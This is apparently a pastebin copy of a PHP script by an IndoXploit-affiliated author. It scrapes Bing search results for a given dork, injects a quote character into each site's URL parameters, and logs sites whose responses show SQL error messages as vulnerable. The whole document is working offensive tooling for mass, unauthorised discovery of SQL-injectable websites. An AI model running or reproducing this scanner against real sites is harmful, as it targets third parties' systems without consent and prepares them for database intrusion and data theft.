SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | // SQL Scanner via Bing Dorker | |
3 | // Coded by Mr. Error 404 ( l0c4lh34rtz) - IndoXploit | |
4 | // Greetz: Sanjungan Jiwa - Jancok Sec - Res7ock Crew | |
5 | // usage: php sql.php 'bing_dorker' | |
6 | // ex: php sql.php '"page.php?id=1" site:it' | |
7 | ||
8 | set_time_limit(0); | |
9 | error_reporting(0); | |
10 | @ini_set('memory_limit', '64M'); | |
11 | @header('Content-Type: text/html; charset=UTF-8'); | |
12 | ||
13 | function cover() { | |
14 | print " ****** SQL Scanner via Bing Dorker ******\n"; | |
15 | print " ***** Coded by l0c4lh34rtz - IndoXploit *****\n"; | |
16 | print " **** Sanjungan Jiwa - Jancok Sec - Res7ock Crew ****\n"; | |
17 | print " *** usage: php sql.php 'bing_dork' ***\n"; | |
18 | print " ** ex: php sql.php '\"page.php?id=1\" site:it' **\n\n"; | |
19 | } | |
20 | $error[] = 'You have an error in your SQL'; | |
21 | $error[] = 'supplied argument is not a valid MySQL result resource in'; | |
22 | $error[] = 'Division by zero in'; | |
23 | $error[] = 'Call to a member function'; | |
24 | $error[] = 'Microsoft JET Database'; | |
25 | $error[] = 'ODBC Microsoft Access Driver'; | |
26 | $error[] = 'Microsoft OLE DB Provider for SQL Server'; | |
27 | $error[] = 'Unclosed quotation mark'; | |
28 | $error[] = 'Microsoft OLE DB Provider for Oracle'; | |
29 | $error[] = 'Incorrect syntax near'; | |
30 | $error[] = 'SQL query failed'; | |
31 | $error[] = 'Warning: filesize()'; | |
32 | $error[] = 'Warning: preg_match()'; | |
33 | $error[] = 'Warning: array_merge()'; | |
34 | $error[] = 'Warning: mysql_query()'; | |
35 | $error[] = 'Warning: mysql_num_rows()'; | |
36 | $error[] = 'Warning: session_start()'; | |
37 | $error[] = 'Warning: getimagesize()'; | |
38 | $error[] = 'Warning: mysql_fetch_array()'; | |
39 | $error[] = 'Warning: mysql_fetch_assoc()'; | |
40 | $error[] = 'Warning: is_writable()'; | |
41 | $error[] = 'Warning: Unknown()'; | |
42 | $error[] = 'Warning: mysql_result()'; | |
43 | $error[] = 'Warning: pg_exec()'; | |
44 | $error[] = 'Warning: require()'; | |
45 | ||
46 | function getsource($url) { | |
47 | $curl = curl_init($url); | |
48 | curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); | |
49 | $content = curl_exec($curl); | |
50 | curl_close($curl); | |
51 | return $content; | |
52 | } | |
53 | function inject($url) { | |
54 | $data = getsource(str_replace("=", "='", $url)); | |
55 | $errors = implode("|", $GLOBALS['error']); | |
56 | return preg_match("#{$errors}#i", $data); | |
57 | } | |
58 | function simpen($isi) { | |
59 | $f = fopen("result_sql.txt","a+"); | |
60 | fwrite($f, "$isi\n"); | |
61 | fclose($f); | |
62 | } | |
63 | ||
64 | $do = urlencode($argv[1]); | |
65 | if(isset($argv[1])) { | |
66 | cover(); | |
67 | $npage = 1; | |
68 | $npages = 30000; | |
69 | $allLinks = array(); | |
70 | $lll = array(); | |
71 | while($npage <= $npages) { | |
72 | $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage); | |
73 | if($x) { | |
74 | preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink); | |
75 | foreach ($findlink[1] as $fl) array_push($allLinks, $fl); | |
76 | $npage = $npage + 10; | |
77 | if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break; | |
78 | } else break; | |
79 | } | |
80 | foreach($allLinks as $url) { | |
81 | $urls = parse_url($url, PHP_URL_HOST); | |
82 | $urls = "http://$urls/"; | |
83 | if($_SESSION[$urls]) { | |
84 | // | |
85 | } else { | |
86 | $_SESSION[$urls] = "1"; | |
87 | if(inject($url)) { | |
88 | print " $url -> Vuln!!\n"; | |
89 | simpen($url); | |
90 | } | |
91 | } | |
92 | } | |
93 | } else { | |
94 | print "usage: php ".$argv[0]." 'bing_dork'\n"; | |
95 | print "ex: php ".$argv[0]." '\"page.php?id=1\" site:it'\n"; | |
96 | } | |
97 | ?> |